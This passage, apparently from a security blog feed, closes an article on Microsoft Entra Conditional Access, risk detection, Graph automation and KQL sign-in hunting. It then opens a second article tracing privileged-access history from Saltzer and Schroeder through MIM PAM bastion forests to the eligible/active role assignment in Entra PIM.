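            # Legacy protocols: Exchange ActiveSync plus "other" (IMAP, POP, SMTP, ...).
            "clientAppTypes": ["exchangeActiveSync", "other"],
        },
        "grantControls": {"operator": "OR", "builtInControls": ["block"]},
    }


policy = block_legacy_auth_policy(BREAK_GLASS_IDS)
print(json.dumps(policy, indent=2))
```

The other four policies follow the same shape. Only the `conditions` and `grantControls` blocks change.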

Automation entry points (Microsoft Graph)

The Graph endpoints administrators care about:

GET /identity/conditionalAccess/policies -- list policies. POST to create, PATCH to update [@ms-graph-capolicy].
GET /identityProtection/riskDetections -- the per-detection log. Filterable by riskLevel, riskState, userPrincipalName, activityDateTime [@ms-graph-riskdetection].
GET /identityProtection/riskyUsers -- the per-user risk view.
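A filtered call to the second endpoint might be assembled like this. The sketch only builds the URL. It assumes the v1.0 Graph base URL and an OData `$filter` on `riskLevel` and `activityDateTime`, and it leaves token acquisition and paging out. The helper name is hypothetical.

```python
from urllib.parse import quote

GRAPH = "https://graph.microsoft.com/v1.0"


def risk_detections_url(risk_level: str, since_iso: str) -> str:
    """Build a riskDetections query filtered by level and activity time."""
    odata_filter = f"riskLevel eq '{risk_level}' and activityDateTime ge {since_iso}"
    # Percent-encode the filter expression so spaces and quotes survive transport.
    return f"{GRAPH}/identityProtection/riskDetections?$filter={quote(odata_filter)}"


url = risk_detections_url("high", "2026-05-01T00:00:00Z")
print(url)
```

Send the URL with a bearer token that carries the appropriate Identity Protection read permission, and follow `@odata.nextLink` while it is present.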

A policy authored in code looks like this (truncated for readability):

{
  "displayName": "Require phishing-resistant for admins",
  "state": "enabledForReportingButNotEnforced",
  "conditions": {
    "users": { "includeRoles": ["62e90394-69f5-4237-9190-012177145e10"] },
    "applications": { "includeApplications": ["All"] }
  },
  "grantControls": {
    "operator": "OR",
    "authenticationStrength": { "id": "00000000-0000-0000-0000-000000000004" }
  }
}

The recommended deployment dance is enabledForReportingButNotEnforced first; let the Sign-in log show you the impact for a calibration window; promote to enabled only after the report-only data matches expectations [@ms-ca-report-only].
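The same discipline can be enforced in tooling. The sketch below prepares, but deliberately does not send, the POST that would create the policy shown above, and refuses any body that is not in report-only state. The guard is this article's convention rather than a Graph requirement. The access token is a placeholder, and the truncated body may need further fields before Graph accepts it.

```python
import json
import urllib.request

GRAPH_POLICIES = "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies"


def build_create_request(policy: dict, access_token: str) -> urllib.request.Request:
    """Prepare (but do not send) the POST that creates a Conditional Access policy."""
    if policy.get("state") != "enabledForReportingButNotEnforced":
        raise ValueError("new policies should start in report-only mode")
    return urllib.request.Request(
        GRAPH_POLICIES,
        data=json.dumps(policy).encode("utf-8"),
        headers={
            "Authorization": f"Bearer {access_token}",
            "Content-Type": "application/json",
        },
        method="POST",
    )


policy = {
    "displayName": "Require phishing-resistant for admins",
    "state": "enabledForReportingButNotEnforced",
    "conditions": {
        "users": {"includeRoles": ["62e90394-69f5-4237-9190-012177145e10"]},
        "applications": {"includeApplications": ["All"]},
    },
    "grantControls": {
        "operator": "OR",
        "authenticationStrength": {"id": "00000000-0000-0000-0000-000000000004"},
    },
}

request = build_create_request(policy, access_token="<token from your auth flow>")
print(request.get_method(), request.full_url)
# Sending is left out on purpose: urllib.request.urlopen(request) would create the policy.
```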

Audit-time visibility

Three surfaces matter:

Sign-in logs in the Entra portal show the per-sign-in evaluation, including which CA policies matched and which grants were satisfied.
Risk-detection log in Identity Protection (P2 only) shows the per-detection narrative: which riskEventType fired, with what additionalInfo, against which user.
The What-If tool simulates a policy evaluation for a hypothetical sign-in, before you enable a policy.

Detection engineering

For E5 tenants, the Sign-in logs and risk detections flow into Microsoft Sentinel (via the Microsoft Entra ID connector) or Defender XDR [@ms-sentinel-aad-connector]. A KQL skeleton for failed sign-ins where Conditional Access reported a failure and a high-risk detection fired looks like:

SigninLogs
| where ResultType != "0"
| where ConditionalAccessStatus == "failure"
| join kind=inner (AADRiskDetections | where RiskLevel == "high") on UserPrincipalName, CorrelationId
| project TimeGenerated, UserPrincipalName, IPAddress, ConditionalAccessStatus, RiskEventType, ResultDescription

The aggregate scale figure is worth remembering: Microsoft processes "more than 100 trillion security signals" daily across all identity products [@ms-managed-policies]. The detection engineer is consuming a small slice that landed in their tenant.

Run the following in Microsoft Sentinel, or directly in the Log Analytics workspace that receives the Entra ID logs, to surface sign-ins that succeeded *despite* a high-confidence risk detection -- the most operationally interesting subset. The query is original to this article; the schema it targets is the canonical Microsoft Sentinel Entra ID connector tables `SigninLogs` and `AADRiskDetections` [@ms-sentinel-aad-connector], and the join-and-filter pattern follows the practice documented in Microsoft's Sentinel hunting guidance [@ms-sentinel-hunting].

let window = 7d;
SigninLogs
| where TimeGenerated > ago(window)
| where ResultType == "0"
| where ConditionalAccessStatus == "success"
| join kind=inner (
    AADRiskDetections
    | where TimeGenerated > ago(window)
    | where RiskLevel == "high"
) on UserPrincipalName, CorrelationId
| project TimeGenerated, UserPrincipalName, IPAddress, AppDisplayName, RiskEventType, ConditionalAccessPolicies
| order by TimeGenerated desc

The expected count for a well-tuned tenant is small. Spikes warrant a priority-2 investigation.

Break-glass

Two emergency-access accounts. FIDO2-bound. Excluded from every CA policy. Stored as separate hardware tokens in separate safes. Every sign-in is wired to a P1 alert. Per Section 9.4 and Microsoft Learn's emergency-access guidance, this is the acknowledged operational compromise to the break-glass paradox [@ms-emergency-access].
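The "every sign-in is wired to a P1 alert" rule reduces to a membership test. The sketch below runs it over sign-in records shaped like Graph `signIn` objects (`userPrincipalName`, `ipAddress`, `createdDateTime`). The account names and alert format are hypothetical, and a production rule would normally live in the SIEM rather than in a script.

```python
# Hypothetical emergency-access accounts; store them lower-cased.
BREAK_GLASS_UPNS = {"bg1@contoso.example", "bg2@contoso.example"}


def break_glass_alerts(sign_ins):
    """Return a P1 alert for every sign-in attempt by a break-glass account."""
    alerts = []
    for event in sign_ins:
        upn = event.get("userPrincipalName", "").lower()
        if upn in BREAK_GLASS_UPNS:
            # No success/failure filter: a failed attempt is just as alarming.
            alerts.append({
                "severity": "P1",
                "upn": upn,
                "ip": event.get("ipAddress"),
                "time": event.get("createdDateTime"),
            })
    return alerts


sample = [
    {"userPrincipalName": "alice@contoso.example", "ipAddress": "198.51.100.7",
     "createdDateTime": "2026-05-30T09:02:00Z"},
    {"userPrincipalName": "BG1@contoso.example", "ipAddress": "203.0.113.9",
     "createdDateTime": "2026-05-30T09:14:00Z"},
]

for alert in break_glass_alerts(sample):
    print(alert)
```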

Break-glass account: A non-personal Entra ID administrator account excluded from Conditional Access and from MFA enforcement, used only when the primary identity infrastructure has failed. Best practice: at least two such accounts, with hardware FIDO2 keys stored separately, monitored by an unconditional alert on any sign-in.

The article has answered "who decided?" five times over: by signal, by policy, by token, by session, by operational pattern. One section remains: the misconceptions that keep recurring.

11. Misconceptions that recur

Every time these questions come up in practice, the same wrong answers come back. The corrections are worth memorising.

Only if you have Entra ID P1 or higher and have configured CA policies. Free SKU tenants run Security Defaults, which is a coarse tenant-wide on/off switch, not CA [@ms-security-defaults]. CA is unlocked at P1 [@ms-ca-overview]; risk-based conditions are unlocked at P2 [@ms-id-protection-overview]. The "every tenant runs on CA" framing you sometimes see in marketing material is incorrect.

No. CA is a cloud control plane. Kerberos and NTLM against on-prem domain controllers do not consult Entra at all [@ms-ca-overview]. If your threat model includes on-prem lateral movement, layer in Defender for Identity and the standard on-prem hardening playbook.

No. CAE is event-driven push from the policy plane to CAE-aware resource APIs. The Microsoft Learn CAE document gives the latency ceiling precisely: "the goal for critical event evaluation is for response to be near real time, but latency of up to 15 minutes might be observed because of event propagation time; however, IP locations policy enforcement is instant" [@ms-cae-concept]. There is no 30-second poll. The token can live up to 28 hours because the revocation is event-driven.

No. Clients advertise CAE-readiness via the `cp1` client capability in token requests, specifically by adding `cp1` to the `xms_cc` claim mechanism (or by calling `WithClientCapabilities(new[] { "cp1" })` in MSAL) [@ms-claims-challenge][@ms-app-resilience-cae]. The Microsoft Learn claims-challenge page is explicit: "The only currently known value is `cp1`" [@ms-claims-challenge]. The CAE-aware token is recognisable by its long lifetime (up to 28 hours) and by the resource API's willingness to issue an `insufficient_claims` challenge, not by a Boolean claim.

No. Third-party MDM compliance partners can write the device compliance state into Entra via Intune's compliance-partner API [@ms-intune-compliance-partners]. The CA grant reads `isCompliant` on the device object; it does not care which MDM wrote that value. Microsoft's preferred deployment is Intune, but the integration point is open by design.

In 2023. The public preview of CA filters for workload identities opened on 26 October 2022 [@vansurksum-2022-workload-ca]; the Microsoft Entra Workload Identities standalone product reached GA in late November 2022, and the Conditional Access feature itself reached general availability later in 2023 [@ms-workload-identity-ca]. Any article asserting a 2025 GA date for workload-identity CA is incorrect.

No. Every sign-in produces a Sign-in log entry; ID Protection emits a `riskDetection` only when at least one detector fires for that sign-in [@ms-graph-riskdetection]. Most sign-ins produce no `riskDetection`. Detection engineers querying for risk should join the Sign-in log with the riskDetections log and treat unjoined rows as "no risk flagged at the moment."

No Microsoft primary source publicly describes the production model architecture or names a per-sign-in feature-vector size. What is published is the detection taxonomy (about two dozen named `riskEventType` values [@ms-id-protection-risks][@ms-graph-riskdetection]), the timing split (real-time / near-real-time / offline [@ms-risk-detection-types]), and the three-tier risk output. The "transformer with 80+ signals" framing is folk knowledge with no Microsoft primary source behind it. The article reframes it as "ML-based with detailed architecture publicly undisclosed."

Not on its own. A standard MFA grant does not defeat a kit like Evilginx, which proxies both the password and the MFA challenge in real time. The defence is to require the *phishing-resistant Authentication Strength* in CA: FIDO2 with hardware attestation, Windows Hello for Business, or multifactor certificate-based authentication [@ms-auth-strengths]. The cryptographic origin-binding in WebAuthn-class credentials defeats AitM by construction. But the defence only works *when the grant is applied*. A CA policy that demands phishing-resistant for admin roles but not for users will block AitM against admins and not against users.

12. Two planes, one boundary

Replay Alice's Tuesday.

Identity Protection's signal plane scored her 09:02 sign-in. The score was below the medium-risk threshold. Conditional Access's policy plane evaluated four matching policies. Two demanded MFA; her cached refresh token already satisfied that grant from yesterday. One demanded a compliant device; Intune had marked her laptop compliant overnight. None demanded the block grant. The token issuer issued a CAE-aware bearer token with a 28-hour lifetime. Exchange Online accepted the token. Outlook's data path opened. Bytes returned to Alice.

If, twelve minutes later, an attacker tries to sign in with Alice's credentials from an anonymizing proxy, ID Protection will fire a detection. The detection will lift her user risk to high. CAE will deliver the high-user-risk event to Exchange. Exchange will issue a claims challenge on the next call from Alice's Outlook. Outlook will replay the challenge to Entra. Entra will re-run CA, see the elevated risk, demand step-up MFA, and either issue a fresh token (after Alice satisfies the step-up) or refuse.
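The client's side of that exchange starts with reading the `401`. The sketch below parses a `WWW-Authenticate` header for the `insufficient_claims` error and decodes its base64 `claims` parameter. The header is assembled locally as a stand-in for what a CAE-aware resource would return, so the authorization URI and claim values are illustrative, and the parser is a simplification rather than a full RFC-compliant one.

```python
import base64
import json
import re


def parse_claims_challenge(www_authenticate: str):
    """Return the decoded claims dict from a CAE 401, or None if absent."""
    params = dict(re.findall(r'(\w+)="([^"]*)"', www_authenticate))
    if params.get("error") != "insufficient_claims" or "claims" not in params:
        return None
    raw = params["claims"]
    padded = raw + "=" * (-len(raw) % 4)  # tolerate stripped base64 padding
    return json.loads(base64.b64decode(padded))


# Illustrative challenge, built here rather than captured from a real service.
challenge = {"access_token": {"nbf": {"essential": True, "value": "1604106651"}}}
encoded = base64.b64encode(json.dumps(challenge).encode()).decode()
header = (
    'Bearer authorization_uri="https://login.microsoftonline.com/common/oauth2/authorize", '
    f'error="insufficient_claims", claims="{encoded}"'
)

print(parse_claims_challenge(header))
```

A CAE-capable client hands the decoded or raw claims value back to its auth library on the next token request, which is what prompts Entra to re-run Conditional Access.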

The modern identity boundary is not a wall. It is a conversation between planes.

Key idea: The boundary is a conversation between planes, not a wall.

The open frontier is real. Agent identities want a richer grant taxonomy than the human one provides. Cross-vendor CAEP wants production receivers outside Microsoft. Workload-identity policy wants grants that go beyond block. The break-glass paradox wants an answer that does not depend on operational discipline. None of these problems will resolve in 2026. They are the next frontier.

What the reader should now be able to do: trace a sign-in through the signal, policy, token, and session planes; read a conditionalAccessPolicy JSON and predict the evaluation outcome; identify which class of attack each grant defends against; and name, by reference to specific Microsoft Learn pages, what CA does not defend against. The promise from Section 1 is delivered.

Today, 100 percent of consumer Microsoft accounts older than 60 days have multifactor authentication. -- Alex Weinert, Microsoft Identity, November 2023 [@weinert-2023-managed-policies]

Who decided this token is good? The boundary itself decided, by composing the work of every plane named above.

Privileged Identity Management: How a Two-State Role Assignment Retired Standing Admin

noreply@paragmali.com (Parag Mali) — Mon, 25 May 2026 00:00:00 GMT

**Standing Global Administrator was never a design choice. It was the only posture a single-state role-assignment object could produce.** Microsoft Entra PIM added one field to that object -- `type: eligible | active` -- and everything downstream (activation policies, audit logs, access reviews, six PIM Alerts, PIM-for-Groups, PIM-for-Azure-Resources, GDAP, Lighthouse, PIM with Conditional Access) is a structural consequence of that single change. The pattern works for human users. The open boundary in 2026 is application identities -- service principals, managed identities, OAuth consent grants -- which route around PIM entirely via the Azure Instance Metadata Service endpoint at `169.254.169.254`, the bypass class Andy Robbins documented in June 2022 and MITRE ATT&CK now maps to T1078.004.

1. The Tenant with Zero Standing Global Administrators

At 14:03:01 on a Tuesday in 2026, alice@contoso.com became Global Administrator of her company's Microsoft Entra tenant. At 15:03:01 the same day, she stopped being one. In between, she restored a deleted user, exported an audit log, and produced a single PIM record: Justification reads "incident MSRC-2026-PIM-12345, ticket SNOW-INC-987654"; Approver reads "bob@contoso.com (decided 14:02:17)"; ActivatedAt and ExpiredAt differ by exactly PT1H. The SOC 2 auditor signed it off without follow-up questions.

The 2015-vintage version of the same tenant looked nothing like this. Twelve standing Global Administrators. No multifactor challenge at privilege use. No approval workflow. No justification field. No audit trail beyond ordinary sign-in logs. A single phish of any one of those twelve identities was tenant takeover. The math required no sophistication: the attack surface for "Global Administrator of contoso.com" equalled the union of twelve personal attack surfaces, indefinitely.

What changed between the two tenants is not a habit, not a policy, not a culture shift. It is a single field on a single object inside Microsoft Entra ID.

Key idea: Standing admin was never a deliberate design decision. It was the only deployment posture a single-state role-assignment object could produce. Once Microsoft made the role-assignment object two-state, JIT admin became expressible -- and standing admin became visibly the anti-pattern it had been since 1975.

To explain that field, and to explain why it took forty-one years to ship, we start where the principle did: a 1975 paper by two MIT researchers who knew what privilege should look like but had no mechanism to enforce it.

2. The Default Wasn't a Decision

Who designed the standing Domain Admin pattern? No one. It was the only assignment category Active Directory shipped with.

A forty-year deployment posture with no author. That is the first thing to internalize. Standing admin is what happens when a data model offers exactly one assignment category and operators still have real work to do. Every later "best practice" was an attempt to talk operators out of the one tool they had been given.

1975: The principle without a mechanism

In September 1975, Jerome Saltzer and Michael Schroeder published The Protection of Information in Computer Systems in the Proceedings of the IEEE [@saltzer-schroeder-1975]. The paper is a survey of secure-systems design, organized around eight named design principles that the authors crystallized from work on Multics and other early protected operating systems. Both authors were affiliated with MIT's Project MAC and the Department of Electrical Engineering and Computer Science [@saltzer-mit-meta].

The sixth principle, named Least Privilege, is the one every later JIT-admin product cites:

Every program and every user of the system should operate using the least set of privileges necessary to complete the job. -- Saltzer & Schroeder, *The Protection of Information in Computer Systems*, 1975, Design Principle (f), the sixth of eight [@saltzer-schroeder-1975]

Least privilege: Design Principle (f), the sixth of eight, in the 1975 Saltzer and Schroeder paper. The principle is correct, parsimonious, and -- for four decades after publication -- mechanically unenforceable for the temporal case. Static enforcement (ACLs, capability lists, ring boundaries) was tractable in 1975; bounding the time interval during which a privilege is held was not.

Read the principle carefully. It does not say "every user should hold the least set of privileges." It says they should operate using the least set of privileges. The two formulations look identical until you ask what a person does between bursts of administrative work. A user who holds the privilege "permanently active" is operating using it permanently, whether they touch the system or not. The 1975 paper points at the temporal dimension and walks past it. The worked examples cover static mechanisms -- protection rings, access control lists, capability tickets -- not time-bounded ones. The principle was correct. The mechanism did not yet exist.

For the next forty years, every approximation tried to compensate. UNIX sudo (1980) bound elevation to a single command. Kerberos delegation (1988) bound impersonation to a ticket. Windows DACLs and Active Directory groups (1993 and 2000) bound access to a static membership list. None made temporal least privilege a first-class data-model property. None let an operator say "I am eligible to be Domain Admin, but I am not Domain Admin right now."

Microsoft's 2014 *Mitigating Pass-the-Hash v2* whitepaper introduced a three-tier administrative model. Tier 0 is identity-system-critical: domain controllers, ADFS, PKI, anything whose compromise gives forest-wide privilege. Tier 1 is enterprise servers and business-critical applications. Tier 2 is user workstations and end users. The enforcement rule is one sentence: an administrator credential for Tier N must never be exposed to a system at a less-trusted (numerically larger) tier. Microsoft has progressively retired this framing in favour of the Enterprise Access Model, which we revisit in section 6.

2000-2013: Group membership as a boolean

When Active Directory shipped with Windows 2000 on February 17, 2000 [@ms-news-windows-2000-launch], privileged access was structurally a boolean property of the principal. A user was either a member of BUILTIN\Administrators, Domain Admins, Enterprise Admins, or Schema Admins, or they were not. The membership lived in the directory as the member attribute on the group object (and the memberOf back-link on the user). It was set when assignment was made, unset when an administrator manually revoked it. No third state. No attribute could hold one.

Standing admin: a privileged identity whose role assignment is active and permanent. The role's permissions are granted continuously, regardless of whether the principal is currently exercising the privilege. Standing admin is the default state of any pre-PIM tenant and the deployed-reality state of most AD-only environments through 2026.

Kerberos's Privilege Attribute Certificate -- the PAC -- carried the user's group SIDs forward into every Kerberos ticket the user obtained. A ticket's lifetime was bounded; the SID set inside it was not. There was no per-membership TTL anywhere in the system. If you wanted "Alice is Domain Admin between 14:00 and 15:00 today and not otherwise," the directory had no machinery to express it. Alice was Domain Admin permanently, or not at all.

Note: The Privilege Attribute Certificate is the data structure inside a Kerberos ticket that lists the user's group SIDs. Pre-2016 Active Directory had no per-membership TTL metadata in the PAC. There was nowhere in the existing schema to put an expiry timestamp, which is why on-prem JIT membership later required a separate forest rather than an in-directory mechanism.

Twenty years of deployment matched the data model exactly. A typical 2010-vintage enterprise ran ten to thirty standing Domain Administrators across business units, because manually adding and removing membership for each task was untenable at human scale. The data model did not punish standing membership; the operator chose the only category the directory offered.

December 2012: Microsoft names the failure mode

In December 2012, Patrick Jungles, Mark Simos, Aaron Margosis, Roger Grimes, Laura Robinson and the Microsoft Trustworthy Computing team published Mitigating Pass-the-Hash and Other Credential Theft, Version 1 [@pth-download-center], [@berkouwer-pth-2013]. It is the first formal Microsoft acknowledgment that credential-theft propagation through Active Directory was not a software defect to be patched but a structural property of standing admin membership.

The argument is direct. If twelve Domain Admins exist, the attack surface of "Domain Admin of contoso.local" is the union of those twelve people's personal attack surfaces. Any one gets phished, or gets hash-extracted from a Tier-1 server they accidentally signed into, and the attacker has Domain Admin permanently. The MIM PAM documentation later restated the failure in one sentence: "Today, it's too easy for attackers to obtain Domain Admins account credentials, and it's too hard to discover these attacks after the fact" [@ms-learn-mim-pam-overview].
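As a rough worked illustration (a sketch under stated assumptions, not a figure from the whitepaper): suppose each of $n$ standing admins is compromised independently in some period with probability $p$. The independence assumption and the value of $p$ are both hypothetical. The chance that at least one of them falls is

$$P(\text{at least one compromised}) = 1 - (1 - p)^{n}$$

With $n = 12$ and an assumed $p = 0.05$, that is $1 - 0.95^{12} \approx 0.46$. A per-person risk that looks small becomes close to a coin flip for the role as a whole, and because the membership is standing, the exposure never closes.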

2014: The tier model arrives, the mechanism does not

The 2014 update -- Mitigating Pass-the-Hash, Version 2 [@pth-download-center] -- generalized the threat model and introduced the Tier-0 / Tier-1 / Tier-2 framing as a structural mitigation. v2 said two things clearly that v1 had only implied. First, standing membership in Tier-0 groups was the root cause, not a downstream defect. Second, the mitigation pattern -- isolate tiers, reduce the standing count, use dedicated Privileged Access Workstations -- was guidance, not a mechanism. Microsoft Trustworthy Computing did not yet have a product that could mechanically time-bound group membership in Active Directory.

v2 named the problem, drew the threat model, and recommended the structural fix. What it could not do was ship a mechanism. The mechanism would come, but on the wrong side of the cloud boundary.

3. The On-Prem Detour: MIM 2016 PAM, Bastion Forests, and Shadow Principals

Microsoft's first mechanical JIT-admin product was not in the cloud. It was on-premises, and it required a separate Active Directory forest.

Stop and re-read that. To bound the duration of a group membership in pre-2016 Active Directory, Microsoft had to build a different directory and inject SIDs from one into the other across a trust. The reason was the data model. The production forest's member attribute had no TTL field. Adding one meant changing the AD schema. Changing the schema meant a Windows Server release. So while the schema change was in flight, Microsoft shipped the on-prem JIT-admin product on a different architecture: ask the operator to stand up a second forest whose only job was to issue time-bounded SIDs into the first.

August 6, 2015: MIM 2016 ships PAM

On August 6, 2015, Microsoft Identity Manager 2016 reached general availability and shipped a new capability named Privileged Access Management [@ms-learn-mim-pam-overview]. The architecture is the interesting part. MIM PAM uses three primitives that, together, give Active Directory a mechanically time-bounded group membership for the first time:

- A bastion forest -- an entirely separate Active Directory forest, sometimes called the "red" forest or "admin" forest, where privileged accounts live.
- A one-way PAM trust from the production forest to the bastion forest, configured for selective authentication.
- Shadow principal objects in the bastion forest, each carrying a SID that names a real privileged group in the production forest.

Bastion forest: a separate Active Directory forest dedicated to housing privileged accounts. In MIM 2016 PAM the bastion forest holds shadow-principal objects whose SIDs point at production-forest privileged groups; a one-way PAM trust lets the production forest accept those SIDs in incoming Kerberos tickets for a bounded duration.

Shadow principal: an Active Directory object (schema class `msDS-ShadowPrincipal`, introduced in Windows Server 2016) that represents a foreign user, group, or computer in the bastion forest and carries an `msDS-ShadowPrincipalSid` attribute populated with the SID of a production-forest privileged group. Membership in a shadow principal results in that production-forest SID being added to the requesting user's Kerberos PAC for the membership TTL.

The activation flow is direct. A user in the bastion forest requests privilege through the MIM Portal. An approver decides. MIM writes a TTL-bounded membership in the appropriate shadow principal, with the TTL enforced by the Windows Server 2016 temporal-group-membership feature [@teal-esae3]. The bastion KDC injects the production-forest SID into the user's Kerberos PAC. The production forest accepts that SID across the PAM trust. After the TTL expires, subsequent ticket renewals exclude the privileged SID, and the user no longer holds the privilege.
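The TTL-bounded membership at the heart of that flow can be modelled in a few lines of JavaScript. This is a simplified sketch, not MIM or KDC code: the class `ShadowPrincipal`, the function `sidsForTicket`, and the SID strings are all hypothetical, and real ticket renewal involves far more than a list concatenation.

```javascript
// Simplified model of TTL-bounded shadow-principal membership.
// All names and SIDs are hypothetical illustrations.
class ShadowPrincipal {
  constructor(productionSid) {
    this.productionSid = productionSid; // SID of the production-forest privileged group
    this.members = new Map();           // user -> expiry time (ms since epoch)
  }
  addMember(user, nowMs, ttlSeconds) {
    this.members.set(user, nowMs + ttlSeconds * 1000);
  }
  isMember(user, nowMs) {
    const expiry = this.members.get(user);
    return expiry !== undefined && nowMs < expiry;
  }
}

// SIDs the bastion KDC would place in the PAC when a ticket is issued or renewed.
function sidsForTicket(user, baseSids, shadowPrincipals, nowMs) {
  const injected = shadowPrincipals
    .filter((sp) => sp.isMember(user, nowMs))
    .map((sp) => sp.productionSid);
  return [...baseSids, ...injected];
}

const t0 = Date.UTC(2026, 0, 6, 14, 0, 0);
const privilegedSid = 'S-1-5-21-1111111111-2222222222-3333333333-512';
const domainAdmins = new ShadowPrincipal(privilegedSid);
domainAdmins.addMember('alice', t0, 3600); // one-hour TTL

const baseSids = ['S-1-5-21-9-9-9-1104'];
const during = sidsForTicket('alice', baseSids, [domainAdmins], t0 + 30 * 60 * 1000);
const after = sidsForTicket('alice', baseSids, [domainAdmins], t0 + 61 * 60 * 1000);
console.log(during.length, after.length); // 2 1
```

The privilege is never revoked by an operator in this model. It simply stops being included once the clock passes the expiry, which is the property the pre-2016 `member` attribute could not express.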

flowchart LR
    subgraph BASTION["CORP-PRIV bastion forest"]
        A["Privileged user account"]
        SP["Shadow principal (msDS-ShadowPrincipal) carries production SID, TTL"]
        BKDC["Bastion KDC"]
        A -->|"Time-bound membership"| SP
        SP --> BKDC
    end
    subgraph PROD["CORP production forest"]
        DA["Domain Admins"]
        PKDC["Production KDC"]
    end
    BKDC -->|"Kerberos ticket carries injected SID via PAM trust"| PKDC
    PKDC -->|"SID in PAC grants membership for TTL only"| DA

October 15, 2016: Windows Server 2016 makes the mechanism real

For the first fourteen months of MIM 2016's life, the full feature did not work. The temporal-group-membership and shadow-principal schema classes that MIM PAM depends on are AD primitives that arrived only with Windows Server 2016, which reached general availability on October 15, 2016 [@ms-learn-lifecycle-ws2016]. Microsoft Learn states the requirement directly: "With Windows Server 2016, PAM features of time-limited group memberships and shadow principal groups are built into Windows Server Active Directory" [@ms-learn-raise-bastion], and "All domain controllers in the bastion environment for the PRIV forest must be Windows Server 2016 or later" [@ms-learn-raise-bastion].

Note: The PAM trust is technically a forest trust with selective authentication enabled. The selective authentication flag is what prevents the bastion forest's privileged identities from being usable for anything other than the explicit shadow-principal SID injection -- without it, the bastion forest would itself become a sprawling privileged-access surface.

This is the moment AD itself gains a temporal least-privilege primitive, forty-one years after Saltzer and Schroeder published the principle. The mechanism is real, but the operational profile is brutal.

Three reasons it did not generalize

MIM PAM solved exactly one problem and could not be extended to the next. Three structural constraints kept it confined to a niche.

First, it was on-premises only. A bastion forest is an Active Directory artifact. Microsoft Entra ID, Office 365, and Azure RBAC role assignments live in a different identity system, with no concept of a forest, no PAM trust target, and no place to plug a shadow-principal object. MIM PAM had no cloud story, and by 2015 the cloud was already where most new Microsoft privileged-access surfaces were being deployed.

Second, the operational complexity filtered out everyone except the most security-mature shops. A bastion forest is a separate Active Directory forest, with its own domain controllers, replication, backup, disaster recovery, and PKI implications. The deployment also requires MIM Service, MIM Portal, MIM Web Service, and SQL Server. Auditing the PAM trust correctly is itself non-trivial work. Microsoft Learn now positions MIM PAM as appropriate only for isolated, non-Internet-connected deployments [@ms-learn-mim-pam-overview]; the verbatim positioning and the MIM 2016 lifecycle details are in the Callout below.

Note: Microsoft Learn states MIM PAM is "not recommended for new deployments in Internet-connected environments" and positions it for "isolated AD environments where Internet access is not available" [@ms-learn-mim-pam-overview]. MIM 2016 itself remains in extended support through January 9, 2029 [@ms-learn-mim-2016], and Microsoft has shipped SP3 compatibility updates for SharePoint Subscription Edition, Exchange SE, and SQL Server 2022 -- but the cloud-first Entra PIM path is the canonical answer for new tenants.

Third, the forest-functional-level dependency delayed real deployment by more than a year. Shadow principals were not usable until Windows Server 2016 reached GA in October 2016. MIM 2016 had been generally available since August 2015. For its first fourteen months in market, the headline JIT-admin feature could not be configured at full fidelity. By the time Windows Server 2016 shipped, Microsoft was already operating its cloud PIM in production.

What the on-prem detour reveals about the cloud's shape

MIM PAM mechanically bounds membership in groups via shadow principals in a separate forest. The cloud has no concept of a forest. So the cloud-native mechanical bound must attach to the assignment object directly, not to the group object indirected through a separate forest. The cloud needed a new assignment-category type, not a new forest topology.

The cloud does not have a forest. It has a role-assignment object. What if that object grew a second state?

4. The Breakthrough: A Two-State Role-Assignment Object

By August 2015, just as MIM 2016 PAM was reaching general availability for the on-premises case, the Microsoft Identity Division had already shipped something different for the cloud. They shipped a role-assignment object with one new field. That field changed everything that came after it.

The 2015 preview

Alex Simons's August 27, 2015 capability-update post on the CloudBlogs (now migrated to Microsoft Tech Community) is the first public articulation of what Azure AD PIM was building [@simons-2015-aug]. It introduced four surfaces: an eligible assignment category distinct from active, multifactor authentication required at activation, security alerts that watched for privileged-role anomalies, and what the post called Security Reviews -- the precursor to access reviews. The architecture under those four surfaces is the load-bearing part: a single new field on the role-assignment object.

On September 15, 2016, Azure AD Premium P2 reached general availability and carried the first generally-available cloud-native PIM, attributed to Joy Chik (then Corporate Vice President of the Identity Division) and the Identity engineering team [@techcommunity-p2-ga]. Eligible-versus-active was now a billable, supported, production-grade feature.

The one-function spine

Read this carefully. It is the article's central claim.

Key idea: Standing admin was the default not because anyone thought it was secure, but because the role-assignment object had only one state. PIM's contribution is to add a second state -- eligible -- and to make the transition from eligible to active a gated, audited, time-bounded operation that is by definition mediated by PIM.

The principle was Saltzer and Schroeder, 1975. The recognition that standing admin was the failure mode was Mitigating Pass-the-Hash, 2012 and 2014. The on-premises mechanism was MIM 2016 PAM. The cloud answer is a different shape entirely: not a new directory and a SID-injection trust, but a single field on the assignment object itself.

Microsoft Learn documents the resulting terminology in the PIM overview. A principal -- user, group, service principal, or managed identity -- can be eligible or active for a role, and either assignment can be permanent or time-bound [@ms-learn-pim-configure]. The same page elevates a forty-year-old phrase into a product term: "principle of least privilege access -- A recommended security practice in which every user is provided with only the minimum privileges needed to accomplish the tasks they're authorized to perform" [@ms-learn-pim-configure]. The 1975 sentence is now a glossary entry inside a 2026 product, and the product has a mechanism that makes the sentence enforceable.

The formal tuple

Concretely, a PIM-managed role assignment is a 5-tuple. Let $A = (p, r, s, t, d)$ where $p$ is the principal, $r$ is the role, $s$ is the scope, $t \in \{\text{eligible}, \text{active}\}$, and $d \in \{\text{permanent}, \text{time-bound}[s_0, e_0]\}$. The activation transition is

$$\text{activate}: A_{t=\text{eligible}} \longrightarrow A_{t=\text{active},\ d=\text{time-bound}[\text{now},\ \text{now}+\Delta]}$$

subject to the per-role activation policy. The interesting part is what the tuple makes expressible:

RoleAssignment = {
    principal:  user | group | service principal | managed identity,
    role:       Entra directory role | Azure RBAC role | group membership | group ownership,
    scope:      directory | management-group | subscription | resource-group | resource | group,
    type:       eligible | active,
    duration:   permanent | time-bound[start, end]
}

activate: eligible_assignment -> active_assignment   // PIM-mediated, gated, audited

Eligible assignment: a PIM-managed role assignment that grants no privilege until the principal invokes `activate()`. The eligible assignment is the standing relationship between principal and role; the active assignment is the time-bounded materialization that follows when the activation policy is satisfied [@ms-learn-pim-configure].

Active assignment: a PIM-managed role assignment that grants the role's permissions for the duration of the assignment. Active assignments are either permanent (the legacy pre-PIM posture, or an explicit permanent-active PIM assignment) or time-bound (the result of an `activate()` call on an eligible assignment) [@ms-learn-pim-configure].

flowchart TD
    subgraph Permanent["Permanent duration"]
        PE["Permanent eligible -- standing eligibility, no privilege held"]
        PA["Permanent active -- legacy standing admin"]
    end
